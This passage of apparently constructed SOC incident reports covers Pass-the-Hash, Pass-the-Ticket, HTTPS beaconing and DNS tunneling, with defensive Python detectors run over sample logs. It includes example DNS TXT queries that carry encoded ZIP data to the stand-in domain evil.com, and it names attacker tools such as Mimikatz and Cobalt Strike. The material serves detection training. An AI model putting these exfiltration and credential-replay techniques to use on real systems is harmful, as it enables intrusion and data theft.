10:00 – Reconnaissance
10:15-10:25 – File transfer
10:30 – Alert
10:32 – SOC investigates
10:33 – Both hosts isolated
10:34 – Files deleted
Indicators of Compromise (IoCs):
Network:
– SMB access to \\FILESRV-01\ADMIN$
– File transfers (psexesvc.exe, mimikatz.exe, update.ps1)
Files (on FILESRV-01):
– \\FILESRV-01\ADMIN$\System32\psexesvc.exe (deleted)
– \\FILESRV-01\C$\Windows\Temp\mimikatz.exe (deleted)
– \\FILESRV-01\ADMIN$\System32\tasks\update.ps1 (deleted)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated both ENG-WS-045 and FILESRV-01.
Deleted all transferred files from FILESRV-01.
Disabled rpatel account.
Reset password.
Host Remediation:
Reimaged ENG-WS-045.
Full scan of FILESRV-01 (clean).
Verified no execution occurred.
Network Remediation:
Restricted SMB admin share access to specific admin hosts.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing SMB lateral movement.
Contributing Factors:
No MFA on account.
SMB admin shares accessible from any host.
No network segmentation.
6. Business Impact:
Operational Impact: Two hosts offline for 2 hours.
Data Exposure: Tools staged but not executed.
7. Remediation & Prevention:
Completed Actions:
Lateral movement stopped.
Tools removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Restricted SMB admin share access.
Implemented network segmentation.
Enhanced monitoring for SMB admin share access.
8. Conclusion:
An attacker used a compromised account to access the ADMIN$ share on a file server via SMB, transferring hacking tools for later execution. Zeek detected the anomalous SMB activity, enabling removal of the tools before execution.
Closure Rationale: Lateral movement stopped; tools removed; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-11 11:30 EST
Batch 34: Lateral Movement & Command and Control Incident Reports
166. T1550.002 – Pass the Hash (Microsoft Defender for Identity Detection)
Microsoft Defender for Identity Alert Details
Alert ID: MDI-PASS-HASH-1550-7842
Alert Time: 2024-03-12 09:30:15 EST
Severity: CRITICAL (98/100)
Source: Microsoft Defender for Identity
Rule: “Pass-the-Hash Attack Detected”
MITRE ATT&CK: T1550.002 – Use Alternate Authentication Material: Pass the Hash
Alert Details:
Detection: NTLM authentication using hash instead of password (Pass-the-Hash)
Source Host: 192.168.45.78 (ENG-WS-045 – Engineering Workstation)
Destination: 192.168.10.20 (FILESRV-02 – File Server)
User: rpatel@company.com
Time: 09:25 EST
Authentication Details:
Protocol: NTLM (not Kerberos)
Authentication Type: NTLMv2
Hash Present: Yes (NTLM challenge response computed directly from the stolen NT hash; no plaintext password involved)
Session Key: Derived from the same NT hash
Target Service: CIFS (file access)
Anomaly Detection:
User rpatel normally uses Kerberos for authentication
NTLM usage unusual for this user in this context
Source host is engineering workstation (not IT)
Multiple previous failed logins from same source
Pattern matches Pass-the-Hash attack
Additional Context:
rpatel’s account had been flagged for suspicious activity
Host 192.168.45.78 was compromised earlier (Cobalt Strike)
Attacker using stolen hash to move laterally
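The three anomaly points above, applied as an added example (not MDI's own logic) to Windows Security events collected from the target server: a per-user baseline of authentication package and source hosts, then a score for each NTLM network logon that deviates from it and was preceded by failures from the same source. The events, the ten-minute window, the 10 % NTLM threshold and the score table are constructed assumptions.

```python
"""Pass-the-Hash triage over Windows Security events (4624 success / 4625 failure)
from the target server: NTLM for a user who normally authenticates with Kerberos,
a source host never seen for that user, and failed logons from that source just
before the success.

Added example, not MDI's own logic. Events are constructed; the window, the NTLM
share threshold and the score table are assumptions."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed baseline: rpatel reaches FILESRV-02 via Kerberos from his own workstation on five prior days.
BASELINE = [
    {"ts": f"2024-03-{day:02d}T09:00:00", "id": 4624, "user": "rpatel",
     "src": "192.168.45.60", "auth": "Kerberos", "logon_type": 3}
    for day in range(4, 9)
]

# Constructed events for the incident window on FILESRV-02.
EVENTS = [
    {"ts": "2024-03-12T08:58:00", "id": 4625, "user": "rpatel", "src": "192.168.45.78", "auth": "NTLM", "logon_type": 3},
    {"ts": "2024-03-12T08:58:30", "id": 4625, "user": "rpatel", "src": "192.168.45.78", "auth": "NTLM", "logon_type": 3},
    {"ts": "2024-03-12T09:00:00", "id": 4624, "user": "rpatel", "src": "192.168.45.78", "auth": "NTLM", "logon_type": 3},
    # Same user, his own workstation, Kerberos: must not alert.
    {"ts": "2024-03-12T09:05:00", "id": 4624, "user": "rpatel", "src": "192.168.45.60", "auth": "Kerberos", "logon_type": 3},
    # Service account with no history that always uses NTLM from one host: low score only.
    {"ts": "2024-03-12T09:06:00", "id": 4624, "user": "svc_backup", "src": "192.168.10.40", "auth": "NTLM", "logon_type": 3},
]


def build_baseline(events):
    """Per-user authentication-package counts and the set of source hosts seen for successful logons."""
    auth = defaultdict(Counter)
    hosts = defaultdict(set)
    for e in events:
        if e["id"] == 4624:
            auth[e["user"]][e["auth"]] += 1
            hosts[e["user"]].add(e["src"])
    return auth, hosts


def score_logon(e, auth, hosts, recent_failures, min_history=5, max_ntlm_share=0.10):
    """Return (score, reasons) for one successful network logon; Kerberos logons score 0."""
    reasons = []
    if e["auth"] != "NTLM":
        return 0, reasons
    history = auth[e["user"]]
    total = sum(history.values())
    if total >= min_history and history["NTLM"] / total <= max_ntlm_share:
        reasons.append(f"user normally authenticates with Kerberos ({history['NTLM']}/{total} NTLM historically)")
    if e["src"] not in hosts[e["user"]]:
        reasons.append(f"first successful logon for {e['user']} from {e['src']}")
    if recent_failures >= 2:
        reasons.append(f"{recent_failures} failed logons from {e['src']} in the preceding window")
    return {0: 0, 1: 40, 2: 70, 3: 95}[len(reasons)], reasons


def detect_pth(baseline_events, events, window=timedelta(minutes=10), min_score=70):
    """Alerts for network logons (type 3) that look like NTLM hash replay."""
    auth, hosts = build_baseline(baseline_events)
    alerts = []
    for e in events:
        if e["id"] != 4624 or e["logon_type"] != 3:
            continue
        t = datetime.fromisoformat(e["ts"])
        failures = sum(
            1 for f in events
            if f["id"] == 4625 and f["user"] == e["user"] and f["src"] == e["src"]
            and t - window <= datetime.fromisoformat(f["ts"]) < t
        )
        score, reasons = score_logon(e, auth, hosts, failures)
        if score >= min_score:
            alerts.append({"ts": e["ts"], "user": e["user"], "src": e["src"], "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect_pth(BASELINE, EVENTS):
        print(a["ts"], a["user"], a["src"], a["score"], "; ".join(a["reasons"]))
```

Two caveats when tuning this. NTLM by itself is not proof of Pass-the-Hash: a client that addresses a server by IP address, as the SMB alert earlier in this batch does with \\192.168.10.50, cannot obtain a Kerberos service ticket and falls back to NTLM legitimately, which is why the baseline deviation and the unfamiliar source host carry most of the weight. The source side of the attack leaves its own artefact: Mimikatz sekurlsa::pth produces a local 4624 with logon type 9, logon process seclogo and authentication package Negotiate on the compromised host, which deserves a separate endpoint rule.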
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify MDI alert | Microsoft Defender for Identity | Confirmed Pass-the-Hash attack |
| 2. Source Investigation | Check ENG-WS-045 | CrowdStrike Falcon | Host has active Cobalt Strike beacon |
| 3. Immediate Action | Isolate source host | CrowdStrike | ENG-WS-045 quarantined |
| 4. Account Remediation | Reset rpatel password | Azure AD, AD | Password reset; force logoff |
| 5. Hash Revocation | Invalidate stolen NT hash | AD | Covered by the password reset: the NT hash is derived from the password, so the stolen hash stops authenticating once the new password has replicated |
| 6. Threat Hunting | Check for other Pass-the-Hash activity | MDI, Splunk | No other instances found |
Jira Incident Report
Ticket: SOC-2024-206
Summary: T1550.002 – Pass-the-Hash Attack from Compromised Engineering Host
Status: RESOLVED
Resolution: MALICIOUS – Lateral Movement Blocked
Priority: P1 – CRITICAL
Labels: T1550, pass-the-hash, lateral-movement, mdi, compromised-host
Components: Identity-Management, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Identity.
Alert: “Pass-the-Hash Attack Detected”.
Source Host: ENG-WS-045 (Engineering, IP 192.168.45.78).
Target: FILESRV-02 (File Server).
User: rpatel@company.com (compromised).
Time: 2024-03-12 09:30 EST.
Technique: MITRE ATT&CK T1550.002 – Use Alternate Authentication Material: Pass the Hash.
2. Technical Analysis:
Attack Chain:
08:30 – rpatel account compromised via phishing
08:45 – Attacker logs into ENG-WS-045 via RDP
08:50 – Attacker dumps hashes from LSASS using Mimikatz
09:00 – Attacker uses rpatel’s hash to authenticate to FILESRV-02 (Pass-the-Hash)
09:10 – Attacker accesses files on file server
09:25 – MDI detects
Pass-the-Hash Technique:
Attacker obtained NTLM hash of rpatel’s account
Used hash to authenticate without knowing plaintext password
Bypassed need for password
Allowed lateral movement to file server
Compromised Host:
ENG-WS-045 had active Cobalt Strike beacon
Mimikatz used to extract hashes
Multiple hashes stolen (including rpatel)
Successful Lateral Movement:
Attacker accessed \\FILESRV-02\finance (financial documents)
Viewed 5 files (no download logs)
No data exfiltration detected
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
08:50 – Hash extraction
09:00 – Lateral movement to file server
09:25 – MDI detects
09:27 – SOC investigates
09:28 – ENG-WS-045 isolated
09:29 – rpatel password reset
Indicators of Compromise (IoCs):
Host:
– ENG-WS-045 (compromised)
Account:
– rpatel (hash stolen, password reset)
Tools:
– Mimikatz (SHA256: a1b2c3d4…)
– Cobalt Strike beacon (SHA256: b2c3d4e5…)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Reset rpatel password.
Forced logoff of all active sessions.
Revoked any active tokens.
Host Remediation:
Full forensic analysis.
Cobalt Strike beacon removed.
Host reimaged.
Data Protection:
Reviewed accessed files on file server (5 files, non-sensitive).
No data exfiltration confirmed.
5. Root Cause Analysis:
Primary Cause: User credentials compromised, leading to hash theft and lateral movement.
Contributing Factors:
No MFA on account.
LSASS accessible (no Credential Guard).
Network segmentation insufficient.
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: Files viewed but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Host isolated and cleaned.
Password reset.
Hashes invalidated.
Technical Controls Enhanced:
Enabled Credential Guard on all endpoints.
Restricted lateral movement via network segmentation.
Enhanced MDI monitoring for Pass-the-Hash.
8. Conclusion:
An attacker used compromised credentials to dump hashes and perform a Pass-the-Hash attack, moving laterally to a file server. MDI detected the anomalous NTLM authentication and enabled rapid containment.
Closure Rationale: Lateral movement blocked; host cleaned; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-12 10:30 EST
167. T1550.003 – Pass the Ticket (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-PASS-TICKET-1550-7842
Alert Time: 2024-03-12 14:15:33 EST
Severity: CRITICAL (97/100)
Source: CrowdStrike Falcon EDR
Rule: “Kerberos Ticket Replay – Potential Pass-the-Ticket”
MITRE ATT&CK: T1550.003 – Use Alternate Authentication Material: Pass the Ticket
Alert Details:
Detection: Kerberos ticket from unusual source IP used for authentication
Event Details:
User: kwilson@company.com (Karen Wilson, Finance Manager)
Source IP: 192.168.45.78 (ENG-WS-045 – Engineering)
Destination: 192.168.10.10 (DC-01 – Domain Controller)
Ticket Type: TGT (Ticket Granting Ticket)
Ticket Issued: 14:00 EST (legitimate from Finance workstation)
Ticket Used: 14:10 EST (from Engineering workstation)
Time: 14:10 EST
Detection Logic:
Ticket originally issued to Finance workstation (192.168.45.112)
Same ticket used from Engineering workstation (impossible travel)
Ticket replay detected (Pass-the-Ticket)
Source host ENG-WS-045 is compromised
Additional Context:
Attacker stole ticket from Finance workstation
Using ticket to impersonate kwilson and access resources
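The "issued to one host, used from another" logic above, as an added example that is not CrowdStrike's detection: it correlates domain-controller Kerberos audit events (4768, a TGT was issued; 4769, a service ticket was requested) and flags a service-ticket request for a user from a client address that never obtained its own TGT while the same user holds a live TGT elsewhere. The events are constructed; the ten-hour lifetime is the default domain maximum TGT lifetime and is assumed unchanged.

```python
"""Ticket-reuse detection from domain-controller Kerberos audit events (4768 TGT
issued, 4769 service ticket requested): a 4769 for a user from a client address
that never obtained a TGT, while the same user holds a live TGT on another host,
is flagged as probable Pass-the-Ticket.

Added example, not CrowdStrike's detection. Events are constructed; TGT_LIFETIME
is the default domain maximum ticket lifetime (assumed unchanged)."""
from collections import defaultdict
from datetime import datetime, timedelta

TGT_LIFETIME = timedelta(hours=10)

# Constructed 4768/4769 events as collected from all DCs. 4768 status 0x0 = TGT issued.
KERB_EVENTS = [
    # kwilson's legitimate afternoon on FIN-WS-112: TGT, then a service ticket.
    {"ts": "2024-03-12T14:00:00", "id": 4768, "user": "kwilson", "client": "192.168.45.112", "status": "0x0"},
    {"ts": "2024-03-12T14:00:05", "id": 4769, "user": "kwilson", "client": "192.168.45.112", "service": "cifs/filesrv.company.com"},
    # The stolen TGT replayed from ENG-WS-045: service tickets, but no 4768 from that address.
    {"ts": "2024-03-12T14:10:00", "id": 4769, "user": "kwilson", "client": "192.168.45.78", "service": "cifs/filesrv.company.com"},
    {"ts": "2024-03-12T14:11:30", "id": 4769, "user": "kwilson", "client": "192.168.45.78", "service": "MSSQLSvc/sql-srv-01.company.com:1433"},
    {"ts": "2024-03-12T14:12:00", "id": 4769, "user": "kwilson", "client": "192.168.45.78", "service": "ldap/dc-01.company.com"},
    # A user with two devices: each device requested its own TGT, so nothing to flag.
    {"ts": "2024-03-12T13:50:00", "id": 4768, "user": "alexchen", "client": "192.168.45.78", "status": "0x0"},
    {"ts": "2024-03-12T13:55:00", "id": 4768, "user": "alexchen", "client": "10.20.0.15", "status": "0x0"},
    {"ts": "2024-03-12T14:05:00", "id": 4769, "user": "alexchen", "client": "10.20.0.15", "service": "cifs/filesrv.company.com"},
    # A failed AS-REQ (0x18 = bad password) must not count as a TGT on record.
    {"ts": "2024-03-12T14:08:00", "id": 4768, "user": "bturner", "client": "192.168.45.112", "status": "0x18"},
    {"ts": "2024-03-12T14:09:00", "id": 4769, "user": "bturner", "client": "192.168.45.112", "service": "cifs/filesrv.company.com"},
]


def _when(e):
    return datetime.fromisoformat(e["ts"])


def detect_ticket_reuse(events, lifetime=TGT_LIFETIME):
    """Return {(user, client): {"issued_to": {...}, "services": [...]}} for suspected replays."""
    tgts = defaultdict(list)  # user -> [(issued_at, client_ip)]
    for e in events:
        if e["id"] == 4768 and e.get("status") == "0x0":
            tgts[e["user"]].append((_when(e), e["client"]))

    alerts = defaultdict(lambda: {"issued_to": set(), "services": []})
    for e in sorted(events, key=_when):
        if e["id"] != 4769:
            continue
        now = _when(e)
        live = [(ts, c) for ts, c in tgts[e["user"]] if now - lifetime <= ts <= now]
        if any(c == e["client"] for _, c in live):
            continue  # this host obtained its own TGT: normal Kerberos flow
        if not live:
            continue  # no TGT on record at all (log gap or forged ticket); triage separately
        a = alerts[(e["user"], e["client"])]
        a["issued_to"].update(c for _, c in live)
        a["services"].append(e["service"])
    return dict(alerts)


if __name__ == "__main__":
    for (user, client), a in detect_ticket_reuse(KERB_EVENTS).items():
        print(f"{user} from {client}: TGT issued to {sorted(a['issued_to'])}, used for {a['services']}")
```

Three things decide whether this is usable in production. The 4768 is written only by the DC that issued the TGT and the 4769 only by the DC that issued the service ticket, so the events must be collected from every DC before correlating. Client addresses change legitimately when a laptop moves onto VPN or behind NAT, so those address pools need to be excluded or mapped. And the branch that skips a 4769 with no live TGT at all is worth its own rule for privileged accounts: a forged ticket is never preceded by a 4768.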
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed Pass-the-Ticket attack |
| 2. Source Investigation | Check ENG-WS-045 | CrowdStrike | Host has Cobalt Strike beacon |
| 3. Ticket Source Investigation | Check FIN-WS-112 | CrowdStrike | Host also compromised (Mimikatz) |
| 4. Immediate Action | Isolate both hosts | CrowdStrike | Both hosts quarantined |
| 5. Ticket Revocation | Force krbtgt password reset | AD | krbtgt reset (twice) to invalidate all tickets |
| 6. Account Remediation | Reset kwilson password | Azure AD, AD | Password reset; MFA enforced |
Jira Incident Report
Ticket: SOC-2024-207
Summary: T1550.003 – Pass-the-Ticket Attack from Compromised Engineering Host
Status: RESOLVED
Resolution: MALICIOUS – Tickets Invalidated
Priority: P1 – CRITICAL
Labels: T1550, pass-the-ticket, kerberos, crowdstrike, lateral-movement
Components: Identity-Management, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Kerberos Ticket Replay – Potential Pass-the-Ticket”.
User: kwilson@company.com (Finance Manager).
Original Ticket Location: FIN-WS-112 (Finance).
Ticket Usage Location: ENG-WS-045 (Engineering).
Time: 2024-03-12 14:15 EST.
Technique: MITRE ATT&CK T1550.003 – Use Alternate Authentication Material: Pass the Ticket.
2. Technical Analysis:
Attack Chain:
13:00 – kwilson account compromised (phishing)
13:15 – Attacker logs into FIN-WS-112
13:20 – Attacker uses Mimikatz to extract Kerberos tickets from LSASS memory
13:30 – Attacker transfers tickets to ENG-WS-045 (already compromised)
14:00 – Fresh TGT issued to kwilson on FIN-WS-112 (user unaware) and harvested in turn; this is the ticket later seen replayed
14:05 – Attacker injects the ticket into a logon session on ENG-WS-045
14:10 – Attacker accesses resources as kwilson from the engineering host
14:15 – CrowdStrike detects
Pass-the-Ticket Technique:
Attacker extracts TGT from compromised host memory
Injects TGT into another session
Can impersonate user without password or hash
Sidesteps MFA: a TGT is post-authentication material, so any MFA check satisfied at the user's original logon is not repeated when the ticket is replayed
Attacker Actions Using Ticket:
Accessed \\filesrv\finance (file server)
Accessed SQL-SRV-01 (database server)
Attempted to access DC-01 (blocked by policy)
No data exfiltration
Compromised Hosts:
FIN-WS-112 (ticket source)
ENG-WS-045 (ticket usage)
3. Investigation Findings:
Timeline:
13:00 – kwilson account compromised
13:15 – Attacker on FIN-WS-112
13:20-13:30 – Ticket extraction and transfer
14:00 – Legitimate TGT issued
14:05-14:10 – Ticket injection and usage
14:15 – Alert
14:17 – SOC investigates
14:18 – Both hosts isolated
14:20 – krbtgt reset initiated
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\AppData\Local\Temp\tickets.kirbi (deleted)
Hosts:
– FIN-WS-112 (compromised)
– ENG-WS-045 (compromised)
Account:
– kwilson (compromised)
4. Containment Actions:
Immediate Actions:
Isolated both hosts.
Reset kwilson password.
Reset krbtgt password twice to invalidate all outstanding TGTs (back-to-back resets discard the previous key as well, so every user had to re-authenticate; accepted here as the cost of containment).
Forced all users to re-authenticate.
Host Remediation:
Reimaged both hosts.
Enterprise-wide Actions:
All users forced to log out and back in.
5. Root Cause Analysis:
Primary Cause: User credentials compromised, leading to ticket theft.
Contributing Factors:
No MFA on account.
Kerberos tickets cached in LSASS memory and readable by a local administrator (normal Windows behaviour without Credential Guard).
Network segmentation insufficient.
6. Business Impact:
Operational Impact: Two hosts offline; all users forced to re-authenticate.
Data Exposure: No data stolen.
7. Remediation & Prevention:
Completed Actions:
Tickets invalidated.
Hosts cleaned.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Implemented Credential Guard.
Enhanced monitoring for ticket anomalies.
8. Conclusion:
An attacker stole a finance manager's Kerberos TGT from her compromised workstation and replayed it from a compromised engineering host to reach a file server and a database server as her. CrowdStrike detected the ticket being used from a host it was never issued to and enabled rapid invalidation via krbtgt reset.
Closure Rationale: Tickets invalidated; hosts cleaned; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-12 15:30 EST
168. T1071.001 – Web Protocols C2 Beaconing (Zscaler Detection)
Zscaler Alert Details
Alert ID: ZSCALER-C2-WEB-1071-7842
Alert Time: 2024-03-12 11:30:22 EST
Severity: HIGH (85/100)
Source: Zscaler Internet Access (ZIA)
Rule: “Beaconing to Suspicious Domain – Potential C2”
MITRE ATT&CK: T1071.001 – Application Layer Protocol: Web Protocols
Alert Details:
Detection: Periodic HTTPS connections to suspicious domain (beaconing)
User: alexchen@company.com (Alex Chen, Engineer)
Source IP: 192.168.45.78 (ENG-WS-045)
Destination: https://cdn-update-service[.]com/api/check
Time: 11:15-11:30 EST
Traffic Pattern:
11:15:22 – HTTPS GET /api/check (208 bytes response)
11:20:22 – HTTPS GET /api/check (208 bytes response)
11:25:22 – HTTPS GET /api/check (208 bytes response)
11:30:22 – HTTPS GET /api/check (208 bytes response)
Domain Analysis:
Domain: cdn-update-service[.]com
Registered: 2024-03-05 (7 days ago)
Registrar: Namecheap (privacy protected)
Hosting IP: 185.143.221[.]89 (Bulgaria)
SSL Certificate: Self-signed (issued to “*.cdn-update-service.com”)
Traffic Analysis:
Beacon interval: Exactly 5 minutes
Response size: Exactly 208 bytes (consistent)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
No referrer (direct request)
Detection Logic:
Beaconing pattern (periodic connections to same domain)
Domain age (7 days) and reputation (malicious)
Response size consistency (208 bytes)
User alexchen has no business need for this domain
Pattern matches C2 beaconing
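The three measurable signals in the detection logic above (interval regularity, constant response size, domain age), run as an added example over proxy log lines; this is not Zscaler's own detection. The log lines, the WHOIS ages in DOMAIN_AGE_DAYS and the thresholds are constructed assumptions, and a second host pair with a regular interval but varying sizes and an old domain is included to show why no single signal is enough.

```python
"""Beacon scoring over proxy log lines: interval regularity (coefficient of
variation), constant response size and domain age. Added example, not Zscaler's
detection; log lines, WHOIS ages and thresholds are constructed assumptions."""
import statistics
from datetime import datetime

# Constructed Zscaler-style CSV: time,user,src_ip,host,path,status,resp_bytes
PROXY_LOG = """\
2024-03-12T11:15:22,alexchen@company.com,192.168.45.78,cdn-update-service.com,/api/check,200,208
2024-03-12T11:20:22,alexchen@company.com,192.168.45.78,cdn-update-service.com,/api/check,200,208
2024-03-12T11:25:22,alexchen@company.com,192.168.45.78,cdn-update-service.com,/api/check,200,208
2024-03-12T11:30:22,alexchen@company.com,192.168.45.78,cdn-update-service.com,/api/check,200,208
2024-03-12T11:15:40,alexchen@company.com,192.168.45.78,outlook.office365.com,/owa/,200,18233
2024-03-12T11:20:41,alexchen@company.com,192.168.45.78,outlook.office365.com,/owa/,200,17102
2024-03-12T11:25:39,alexchen@company.com,192.168.45.78,outlook.office365.com,/owa/,200,14511
2024-03-12T11:30:40,alexchen@company.com,192.168.45.78,outlook.office365.com,/owa/,200,19870
2024-03-12T11:16:03,alexchen@company.com,192.168.45.78,github.com,/company/repo,200,40233
2024-03-12T11:17:45,alexchen@company.com,192.168.45.78,github.com,/company/repo/pulls,200,12033
2024-03-12T11:24:10,alexchen@company.com,192.168.45.78,github.com,/company/repo/issues,200,55010
"""

# Assumed WHOIS lookups (days since registration); a real pipeline caches these from RDAP.
DOMAIN_AGE_DAYS = {"cdn-update-service.com": 7, "outlook.office365.com": 7000, "github.com": 5000}


def parse_proxy_log(text):
    rows = []
    for line in text.strip().splitlines():
        ts, user, src, host, path, status, size = line.split(",")
        rows.append({"ts": datetime.fromisoformat(ts), "user": user, "src": src,
                     "host": host, "path": path, "status": int(status), "size": int(size)})
    return rows


def beacon_scores(rows, min_hits=4, max_cv=0.10, young_days=30):
    """Per (src, host) with at least min_hits requests: a 0-100 score and the reasons."""
    by_pair = {}
    for r in rows:
        by_pair.setdefault((r["src"], r["host"]), []).append(r)
    results = {}
    for key, hits in by_pair.items():
        if len(hits) < min_hits:
            continue
        hits.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(hits, hits[1:])]
        cv = statistics.pstdev(gaps) / statistics.mean(gaps)  # spread of the interval relative to its mean
        sizes = {r["size"] for r in hits}
        age = DOMAIN_AGE_DAYS.get(key[1])
        score, reasons = 0, []
        if cv <= max_cv:
            score += 40
            reasons.append(f"regular interval {statistics.mean(gaps):.0f}s (cv={cv:.3f})")
        if len(sizes) == 1:
            score += 30
            reasons.append(f"constant response size {next(iter(sizes))} bytes")
        if age is not None and age < young_days:
            score += 30
            reasons.append(f"domain registered {age} days ago")
        results[key] = {"hits": len(hits), "score": score, "reasons": reasons}
    return results


if __name__ == "__main__":
    for (src, host), r in beacon_scores(parse_proxy_log(PROXY_LOG)).items():
        print(f"{src} -> {host}: {r['score']} ({'; '.join(r['reasons'])})")
```

The mail client polls every five minutes too and scores 40 on regularity alone, which is the point of combining signals. Cobalt Strike's sleep is usually configured with jitter, so the coefficient-of-variation test needs a looser threshold or a longer window over more hits in practice; the constant-size and domain-age signals survive jitter unchanged.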
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify Zscaler alert | Zscaler Admin Console | Confirmed beaconing to suspicious domain |
| 2. Domain Investigation | Check domain reputation | VirusTotal, Threat Intel | Domain flagged as C2 by 42 vendors |
| 3. Process Investigation | Identify process making connections | CrowdStrike Falcon | svchost.exe with injected code (Cobalt Strike) |
| 4. Immediate Action | Isolate host | CrowdStrike | ENG-WS-045 quarantined |
| 5. C2 Blocking | Block domain and IP | Zscaler, Palo Alto | Domain and IP added to blocklists |
| 6. Malware Removal | Clean infected host | CrowdStrike Live Response | Cobalt Strike beacon removed |
Jira Incident Report
Ticket: SOC-2024-208
Summary: T1071.001 – C2 Beaconing to Malicious Domain via HTTPS
Status: RESOLVED
Resolution: MALICIOUS – C2 Blocked, Host Cleaned
Priority: P2 – MEDIUM
Labels: T1071, web-protocols, c2, beaconing, zscaler, cobalt-strike
Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zscaler Internet Access (ZIA).
Alert: “Beaconing to Suspicious Domain – Potential C2”.
User: alexchen@company.com (Engineering Department).
Host: ENG-WS-045.
Domain: cdn-update-service[.]com.
Beacon Interval: 5 minutes.
Time: 2024-03-12 11:30 EST.
Technique: MITRE ATT&CK T1071.001 – Application Layer Protocol: Web Protocols.
2. Technical Analysis:
Attack Chain:
10:30 – alexchen account compromised via phishing
10:45 – Attacker logs into ENG-WS-045
10:50 – Cobalt Strike beacon deployed
11:15 – First beacon to C2
11:15-11:30 – Beaconing every 5 minutes
11:30 – Zscaler detects
C2 Infrastructure:
Domain: cdn-update-service[.]com
IP: 185.143.221[.]89 (Bulgaria)
Port: 443 (HTTPS)
Beacon Interval: 5 minutes (exact)
Response Size: 208 bytes (commands/status)
Malware Analysis:
Type: Cobalt Strike beacon
Process: Injected into svchost.exe
Persistence: Scheduled task “WindowsUpdate”
Capabilities: Remote access, keylogging, file exfiltration
Beacon Activity:
No commands received yet (only check-ins)
No data exfiltration
Beaconing pattern detected early
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
10:50 – Beacon deployed
11:15-11:30 – Beaconing
11:30 – Zscaler alert
11:32 – SOC investigates
11:33 – Host isolated
11:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– Domain: cdn-update-service[.]com
– IP: 185.143.221[.]89
– Beacon interval: 5 minutes
Host:
– svchost.exe (injected)
– Scheduled task: “WindowsUpdate”
Account:
– alexchen (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked C2 domain and IP at firewall and Zscaler.
Terminated beacon process.
Removed scheduled task.
Disabled alexchen account.
Reset password.
Host Remediation:
Full scan, removed Cobalt Strike.
Reimaged as precaution.
User Remediation:
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to malware deployment.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: None (beaconing only).
7. Remediation & Prevention:
Completed Actions:
C2 blocked.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Enhanced monitoring for beaconing patterns.
8. Conclusion:
An attacker deployed a Cobalt Strike beacon on an engineering workstation, which beaconed to a malicious domain every 5 minutes. Zscaler detected the beaconing pattern and enabled rapid containment before any commands could be executed.
Closure Rationale: C2 blocked; malware removed; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-12 12:30 EST
169. T1071.004 – DNS C2/Exfiltration (ExtraHop Detection)
ExtraHop Alert Details
Alert ID: EXTRAHOP-DNS-C2-1071-7842
Alert Time: 2024-03-12 16:30:45 EST
Severity: HIGH (88/100)
Source: ExtraHop Reveal(x)
Rule: “DNS Tunneling Detected – Potential C2 or Exfiltration”
MITRE ATT&CK: T1071.004 – Application Layer Protocol: DNS
Alert Details:
Detection: High volume of DNS queries with encoded subdomains – DNS tunneling
Source: 192.168.45.78 (ENG-WS-045 – Engineering)
DNS Server: 8.8.8.8 (Google DNS)
Time: 16:15-16:30 EST
DNS Query Pattern:
16:15:10 – TXT query for a1b2c3d4e5f6.evil.com (response: 247 bytes)
16:15:15 – TXT query for g7h8i9j0k1l2.evil.com (response: 251 bytes)
16:15:20 – TXT query for m3n4o5p6q7r8.evil.com (response: 242 bytes)
… (continuing every 5-10 seconds)
Query Analysis:
Domain: *.evil.com (registered 2024-03-10)
Query Type: TXT (returns text data)
Subdomain lengths: 12-16 characters (random)
Response sizes: 200-300 bytes each
Total queries: 847 in 15 minutes
Total data transferred: ~210 KB (exfiltrated or C2)
Decoded Data Sample (base64 in subdomains):
Subdomain: a1b2c3d4e5f6 (placeholder for the encoded label)
Label content: “UEsDBBQAAAAIAICIF1Yj…” (base64), which decodes to bytes 50 4B 03 04 14 00 …: the “PK” local-file header of a ZIP archive, so the queries are carrying an archive outbound
Detection Logic:
847 DNS queries in 15 minutes (highly anomalous)
TXT queries with random subdomains (DNS tunneling pattern)
Destination domain suspicious (newly registered)
Response sizes consistent with encoded data
Pattern matches DNS tunneling (C2 or exfiltration)
